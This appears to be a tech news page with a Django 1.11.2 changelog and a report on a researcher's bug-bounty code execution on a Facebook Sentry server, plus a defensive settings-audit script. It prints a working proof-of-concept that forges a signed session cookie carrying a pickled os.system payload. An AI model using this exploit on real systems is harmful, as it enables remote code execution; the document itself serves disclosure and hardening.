Django received a new update

A new version of the popular Python framework is available now
01 July 2017
Django

A high-level, free and open-source Python web framework that encourages rapid, clean development and pragmatic design.

Python

A multi-paradigm programming language with easy-to-use syntax and many features.

One of the most popular Python frameworks has received a new version: Django is now at 1.11.2.

Bugfixes list

  • Added detection for GDAL 2.1 and 2.0, and removed detection for unsupported versions 1.7 and 1.8.
  • Changed contrib.gis to raise ImproperlyConfigured rather than GDALException if gdal isn’t installed, to allow third-party apps to catch that exception.
  • Fixed django.utils.http.is_safe_url() crash on invalid IPv6 URLs.
  • Fixed regression causing pickling of model fields to crash.
  • Fixed django.contrib.auth.authenticate() when multiple authentication backends don’t accept a positional request argument.
  • Fixed introspection of index field ordering on PostgreSQL.
  • Fixed a regression where Model._state.adding wasn’t set correctly on multi-table inheritance parent models after saving a child model.
  • Allowed DjangoJSONEncoder to serialize django.utils.deprecation.CallableBool.
  • Relaxed the validation added in Django 1.11 of the fields in the defaults argument of QuerySet.get_or_create() and update_or_create() to reallow settable model properties.
  • Fixed MultipleObjectMixin.paginate_queryset() crash on Python 2 if the InvalidPage message contains non-ASCII.
  • Prevented Subquery from adding an unnecessary CAST which resulted in invalid SQL.
  • Corrected detection of GDAL 2.1 on Windows.
  • Made date-based generic views return a 404 rather than crash when given an out of range date.
  • Fixed a regression where file_move_safe() crashed when moving files to a CIFS mount.
  • Moved the ImageField file extension validation added in Django 1.11 from the model field to the form field to reallow the use case of storing images without an extension.

Also, a minor new feature: the new LiveServerTestCase.port attribute reallows the use case of binding to a specific port, following the bind-to-port-zero change in Django 1.11.

Another Facebook Vulnerability to be Found

A cybersecurity specialist from SCRT found a way to execute code remotely on a Facebook server
27 August 2018

Daniel Le Gall from SCRT reported a vulnerability he found in one of Facebook's servers. The problem was in Sentry, a log-storage web application written in Python on the Django framework. Facebook's engineers have since patched the security hole on the server.

Daniel found the problem while scanning IP addresses belonging to the social network. On one of them a Sentry service was running under the host name sentryagreements.thefacebook.com. While reviewing the application, he noticed a stack trace that appeared unexpectedly, and problems with the user password reset function. According to him, Django's debug mode had not been disabled, so the trace exposed the entire environment of the application:

[Screenshot: Facebook Vulnerability]

Among the environment keys, the SCRT expert noticed SESSION_SERIALIZER, which was set to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that a forged session containing arbitrary data in Pickle (Python's binary object-serialization protocol) lets one run any code on the system. To forge a session he needed the Django secret key, which appeared in plaintext in the list of Sentry settings under the name system.secret-key:

[Screenshot: Facebook Vulnerability]

The researcher wrote a proof-of-concept script that replaced the contents of the existing sentrysid cookie with an arbitrary object and made the page take 30 seconds longer to load:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)
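As an added, defender-side illustration (not from the SCRT write-up, Sentry or Django): a small Python 3 audit that flags the three conditions that combined here (debug mode on, PickleSerializer for sessions, a weak or exposed secret key), plus a check showing why Django's default JSONSerializer removes the code-execution primitive even when the signing key is known. The settings dicts and the NotJsonSafe class are constructed for the example; the key-length thresholds mirror Django's built-in security.W009 check.

```python
import json
import secrets

PICKLE_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
JSON_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer"  # Django's default
SECRET_KEY_MIN_LENGTH = 50   # same thresholds as Django's check security.W009
SECRET_KEY_MIN_UNIQUE = 5


def audit_session_settings(settings):
    """Return findings for the misconfiguration chain in the Sentry case:
    debug pages leak SECRET_KEY, and PickleSerializer turns a forged
    session into code execution. `settings` is a plain dict standing in
    for a Django settings module."""
    findings = []
    if settings.get("DEBUG", False):
        findings.append("DEBUG=True: error pages expose settings, including SECRET_KEY")
    if settings.get("SESSION_SERIALIZER", JSON_SERIALIZER) == PICKLE_SERIALIZER:
        findings.append("SESSION_SERIALIZER=PickleSerializer: anyone holding SECRET_KEY "
                        "can execute code via a forged session")
    key = settings.get("SECRET_KEY", "")
    if len(key) < SECRET_KEY_MIN_LENGTH or len(set(key)) < SECRET_KEY_MIN_UNIQUE:
        findings.append("SECRET_KEY is missing, short or low-entropy")
    return findings


def is_json_serializable(session_data):
    """True if the session content survives JSONSerializer. A JSON session can
    carry only plain data, so a forged cookie (even one signed with the real
    key) cannot smuggle in an object whose __reduce__ runs a command."""
    try:
        json.dumps(session_data)
        return True
    except TypeError:
        return False


class NotJsonSafe(object):
    """Stand-in for an arbitrary Python object (constructed for this example)."""


# Constructed sample settings: the weak shape beside the hardened one.
LEAKY = {"DEBUG": True, "SESSION_SERIALIZER": PICKLE_SERIALIZER, "SECRET_KEY": "changeme"}
HARDENED = {"DEBUG": False, "SESSION_SERIALIZER": JSON_SERIALIZER,
            # placeholder: a real key is generated once and kept in a secret store
            "SECRET_KEY": secrets.token_urlsafe(50)}

if __name__ == "__main__":
    for name, cfg in (("leaky", LEAKY), ("hardened", HARDENED)):
        print(name, audit_session_settings(cfg) or ["no findings"])
    print(is_json_serializable({"testcookie": "worked"}))       # True
    print(is_json_serializable({"testcookie": NotJsonSafe()}))  # False
```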

He reported the vulnerability to the Facebook team and received $5000 under the Bug Bounty program. The company's specialists fixed the issue within 10 days of receiving the report.